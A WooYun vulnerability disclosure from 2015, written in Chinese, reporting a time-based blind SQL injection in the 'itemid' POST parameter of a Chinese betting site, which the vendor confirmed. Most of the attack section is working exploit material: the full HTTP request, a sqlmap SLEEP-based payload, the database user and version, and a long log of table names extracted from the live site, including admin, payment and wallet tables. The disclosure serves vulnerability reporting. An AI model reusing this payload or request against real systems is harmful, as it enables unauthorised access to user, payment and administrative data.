当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155910

漏洞标题:投注网某处POST注入

相关厂商:投注网

漏洞作者: 路人甲

提交时间:2015-11-26 09:55

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-26: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

http://touzhu.cn/  投注网


POST /ajaxact/ajax_ticket_info.php HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://touzhu.cn
Cookie: PHPSESSID=0i0d8qv1pcg257g3lmtbsgs3f4; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1448331169,1448331342,1448331468,1448331677; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1448331677; HMACCOUNT=3C51B8E09E24C184; box_wxts=on; bdshare_firstime=1448328867470; BAIDUID=59E436C689FE1279BA502F5E6F4883E0:FG=1
Host: touzhu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
itemid=*


itemid参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: itemid=' AND (SELECT * FROM (SELECT(SLEEP(5)))ROcc) AND 'Lbdo'='Lbdo
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5
current user: 'caiso@192.168.0.55'
current database: 'caiso'
current user is DBA: False
available databases [2]:
[*] caiso
[*] information_schema


表太多了,没有跑完...

[17:18:35] [INFO] adjusting time delay to 1 second due to good response times
09
[17:18:39] [INFO] retrieved: activity_activities
[17:20:09] [INFO] retrieved: activity_activity_detail
[17:21:06] [INFO] retrieved: activity_cz_jj
[17:21:44] [INFO] retrieved: admin_channel
[17:22:47] [INFO] retrieved: admin_class
[17:23:14] [INFO] retrieved: admin_friendly_link
[17:24:27] [INFO] retrieved: admin_help_center
[17:25:33] [INFO] retrieved: admin_permissions
[17:26:35] [INFO] retrieved: admin_role
[17:27:05] [INFO] retrieved: admin_role_function
[17:28:03] [INFO] retrieved: admin_syslogs
[17:28:47] [INFO] retrieved: admin_user
[17:29:17] [INFO] retrieved: admin_winprize
[17:30:08] [INFO] retrieved: business_article
[17:31:25] [INFO] retrieved: business_article_category
[17:32:24] [INFO] retrieved: business_article_inlink
[17:33:18] [INFO] retrieved: business_back_money_request
[17:34:58] [INFO] retrieved: business_bonus
[17:35:33] [INFO] retrieved: business_chase
[17:36:06] [INFO] retrieved: business_chaseitem
[17:36:48] [INFO] retrieved: business_city_no
[17:37:34] [INFO] retrieved: business_community
[17:38:26] [INFO] retrieved: business_company
[17:39:01] [INFO] retrieved: business_customer
[17:39:49] [INFO] retrieved: business_customer_commission
[17:41:05] [INFO] retrieved: business_ema
[17:41:42] [ERROR] invalid character detected. retrying..
[17:41:42] [WARNING] increasing time delay to 2 seconds
il
[17:42:00] [INFO] retrieved: business_feedback
[17:43:23] [INFO] retrieved: business_filedownlod
[17:45:23] [INFO] retrieved: business_league
[17:46:38] [INFO] retrieved: business_league_rank
[17:48:03] [INFO] retrieved: business_match_arrange
[17:50:24] [INFO] retrieved: business_match_arrange_test
[17:52:10] [INFO] retrieved: business_match_history
[17:53:54] [INFO] retrieved: business_match_mapping
[17:55:42] [INFO] retrieved: business_match_team_mapping
[17:58:10] [INFO] retrieved: business_mobile
[17:59:22] [INFO] retrieved: business_odd
[18:00:11] [INFO] retrieved: business_order
[18:01:10] [INFO] retrieved: business_order_queue
[18:02:40] [INFO] retrieved: business_order_temp
[18:03:57] [INFO] retrieved: business_part
[18:04:55] [INFO] retrieved:
[18:04:57] [INFO] adjusting time delay to 1 second due to good response times
business_partner
[18:05:25] [INFO] retrieved: business_pay
[18:05:42] [INFO] retrieved: business_pay_out_request
[18:07:03] [INFO] retrieved: business_payment_request
[18:08:16] [INFO] retrieved: business_plan
[18:08:42] [INFO] retrieved: business_plan_item
[18:09:21] [INFO] retrieved: business_prize_level
[18:10:24] [INFO] retrieved: business_recharge_gift
[18:11:39] [INFO] retrieved: business_restricted
[18:12:29] [INFO] retrieved: business_sms_log
[18:13:19] [INFO] retrieved: business_sms_mo_log
[18:14:08] [INFO] retrieved: business_sms_partner
[18:14:59] [INFO] retrieved: business_soft_update
[18:16:05] [INFO] retrieved: business_supplier
[18:16:54] [INFO] retrieved: business_system_param
[18:17:57] [INFO] retrieved: business_team
[18:18:28] [INFO] retrieved: business_term
[18:18:52] [INFO] retrieved: business_term_type_config
[18:20:11] [INFO] retrieved: business_ticket
[18:20:44] [INFO] retrieved: business_wallet
[18:21:27] [INFO] retrieved: business_wallet_log
[18:22:07] [INFO] retrieved: business_win_describe_order
[18:23:41] [INFO] retrieved: business_win_describe_ticket
[18:24:39] [INFO] retrieved: business_win_prize
[18:25:21] [INFO] retrieved: business_you_hui_ma
[18:26:23] [INFO] retrieved: copy_cat
[18:27:03] [INFO] retrieved: event_class
[18:28:00] [INFO] retrieved: event_code
[18:28:23] [INFO] retrieved: event_give
[18:28:54] [INFO] retrieved: event_login
[18:29:29] [INFO] retrieved: event_oscar2015
[18:30:14] [INFO] retrieved: event_oscar2015_award
[18:31:01] [INFO] retrieved: event_oscar2015_items
[18:31:44] [INFO] retrieved: event_packet
[18:32:19] [INFO] retrieved: event_packet_class
[18:33:02] [INFO] retrieved: event_pay
[18:33:18] [INFO] retrieved: odds
[18:33:42] [INFO] retrieved: s
[18:33:53] [ERROR] invalid character detected. retrying..
[18:33:53] [WARNING] increasing time delay to 2 seconds
essions
[18:34:57] [INFO] retrieved: sm_queue
[18:36:03] [INFO] retrieved: tz_agent
[18:37:30] [INFO] retrieved: tz_agent_discount
[18:39:21] [INFO] retrieved: tz_agent_invit
[18:40:40] [ERROR] invalid character detected. retrying..
[18:40:40] [WARNING] increasing time delay to 3 seconds
e
[18:40:50] [INFO] retrieved: tz_apppay_temp
[18:43:49] [INFO] retrieved: tz_balance
[18:45:29] [INFO] retrieved: tz_balance_items
[18:47:21] [INFO] retrieved: tz_checkmobile
[18:49:56] [INFO] retrieved: tz_config
[18:51:35] [INFO] retrieved: tz_discou
[18:53:26] [ERROR] invalid character detected. retrying..
[18:53:26] [WARNING] increasing time delay to 4 seconds
nt_plan
[18:56:04] [INFO] retrieved: tz_discount_plan_items
[18:59:06] [INFO] retrieved: tz_event_pay


漏洞证明:

修复方案:

求高rank

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-27 11:01

厂商回复:

谢谢.大大关心我们的洞.已经交给程序大叔.

最新状态:

暂无